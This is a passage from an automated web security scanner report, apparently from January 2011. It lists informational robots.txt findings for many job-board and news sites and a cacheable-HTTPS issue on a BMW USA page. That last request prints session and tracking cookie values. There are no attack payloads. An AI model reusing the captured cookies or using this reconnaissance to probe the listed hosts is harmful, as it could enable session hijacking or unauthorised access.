Host:   http://www.prcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 16 Dec 2010 05:52:29 GMT
ETag: "24f85f8-1bef-49780a8b6c140"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7151
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow:
...[SNIP]...

19.77. http://www.procurementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.procurementcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:40 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:37:51 GMT
ETag: "2218105-1bf0-476fab5cf35c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.78. http://www.productmanagercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.productmanagercrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:49:09 GMT
ETag: "2508103-1a83-483c75a9fdf40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.79. http://www.projectmanagementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.projectmanagementcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:21 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:38:17 GMT
ETag: "26b82e3-1c1a-476fab75bf040"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7194
Connection: close
Via: 1.1 AN-0016020122545304

       # Robots.txt file for http://www.projectmanagementcrossing.com

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Dis
...[SNIP]...

19.80. http://www.publicinterestcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicinterestcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:35 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:38:40 GMT
ETag: "21f032a-1bf0-476fab8bae400"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.81. http://www.publishingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publishingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:39:00 GMT
ETag: "25c0270-1bf0-476fab9ec1100"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.82. http://www.purchasingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purchasingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:52:18 GMT
ETag: "1c8035e-1a83-483c765e3c880"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.83. http://www.qaqccrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qaqccrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:39:20 GMT
ETag: "25e013b-1bf0-476fabb1d3e00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.84. http://www.radiocrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radiocrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:16 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:39:33 GMT
ETag: "22d1cce-1bf0-476fabbe39b40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.85. http://www.realestateandlandcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realestateandlandcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:01 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:45:25 GMT
ETag: "1d18381-1a83-483c74d45e740"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.86. http://www.recruitingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.recruitingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:16:12 GMT
ETag: "25b012a-1bd8-476fb3ef5af00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.87. http://www.researchingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.researchingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:50:50 GMT
ETag: "1ba8130-1a83-483c760a50280"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.88. http://www.retailcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retailcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:55:08 GMT
ETag: "1d1038b-1a83-483c77005c700"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.89. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rollingstone.com

Response

HTTP/1.0 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=400
Date: Sat, 22 Jan 2011 01:25:34 GMT
Content-Length: 79
Connection: close

User-agent: *
Disallow: /cms.php
Disallow: /preview.php
Disallow: /*?print=true

19.90. http://www.sciencescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sciencescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:06 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:48:30 GMT
ETag: "1c483d4-1a83-483c7584cc780"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.91. http://www.scientistcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scientistcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:46 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:51:04 GMT
ETag: "1dc0109-1a83-483c7617aa200"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.92. http://www.sellingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sellingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:28 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:24:01 GMT
ETag: "2320d8d-1a82-4948c36b4e640"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6786
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 1000-1500
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /html
...[SNIP]...

19.93. http://www.sqlcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sqlcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:17:40 GMT
ETag: "2608175-1bd8-476fb44347500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.94. http://www.teenagercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teenagercrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:54:17 GMT
ETag: "26b8102-1a83-483c76cfb9440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.95. http://www.telecomcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.telecomcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:59 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:48:14 GMT
ETag: "1c68213-1a83-483c75758a380"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.96. http://www.tradingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tradingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:40:18 GMT
ETag: "25b8431-1bf0-476fabe924080"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.97. http://www.trainingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trainingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:44 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:51:52 GMT
ETag: "21f11f5-1a83-483c764570e00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.98. http://www.transportationcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.transportationcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:24 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:48:46 GMT
ETag: "2218b1f-1a83-483c75940eb80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.99. http://www.travelingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:23 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:47:13 GMT
ETag: "1aa00f8-1a83-483c753b5da40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.100. http://www.truckingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truckingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:41:00 GMT
ETag: "24e8105-1bf0-476fac1131f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.101. http://www.tvcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:07 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:41:19 GMT
ETag: "22188f1-1bf0-476fac23509c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.102. http://www.underwritingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.underwritingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:52 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:41:39 GMT
ETag: "1cf82c1-1bf0-476fac36636c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.103. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 1660
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "e3156eb5165ccb1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

19.104. http://www.veterinarycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.veterinarycrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:48 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:19:56 GMT
ETag: "1d8010a-1a84-4948c281a7f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /h
...[SNIP]...

19.105. http://www.volunteercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.volunteercrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:51:34 GMT
ETag: "2500135-1a83-483c763446580"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.106. http://www.workathomecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.workathomecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:40 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:18:42 GMT
ETag: "22182cb-1bd8-476fb47e68080"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.107. http://www.writingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.writingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:00 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 05:50:54 GMT
ETag: "5b8006-1bef-49780a30d2b80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7151
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow:
...[SNIP]...

20. Cacheable HTTPS response
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


20.1. https://www.bmwusa.com/Secured/FrameCheck.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/FrameCheck.aspx

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:38 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/
